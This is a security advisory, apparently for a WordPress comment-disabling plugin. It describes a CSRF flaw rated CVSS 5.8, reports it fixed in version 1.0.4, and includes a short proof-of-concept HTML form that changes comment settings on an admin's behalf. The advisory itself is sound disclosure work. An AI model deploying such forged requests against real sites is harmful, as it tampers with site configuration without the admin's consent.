CVSS Summary
Score | 5.8 Medium |
---|---|
Vector | Network |
Complexity | Medium |
Authentication | None |
Confidentiality | None |
Integrity | Partial |
Availability | Partial |
Last revised:
A CSRF vulnerability would allow an unauthorised attacker to cause a logged in admin to disable or enable comments if that admin visits a link of the attacker’s choosing (via spearphishing for instance).
Current state: Fixed
Score | 5.8 Medium |
---|---|
Vector | Network |
Complexity | Medium |
Authentication | None |
Confidentiality | None |
Integrity | Partial |
Availability | Partial |
Clicking submit on this form will enable comments on all post types.
<form action="http://localhost/wp-admin/options-general.php?page=disable_comments_settings" method="POST"> <input type="radio" name="mode" value="selected_types" checked> <input type='checkbox' name='disabled_types[]' value='post'> <input type='checkbox' name='disabled_types[]' value='page'> <input type='checkbox' name='disabled_types[]' value='attachment'> <input type="submit" name="submit"> </form>
Update to version 1.0.4 immediately.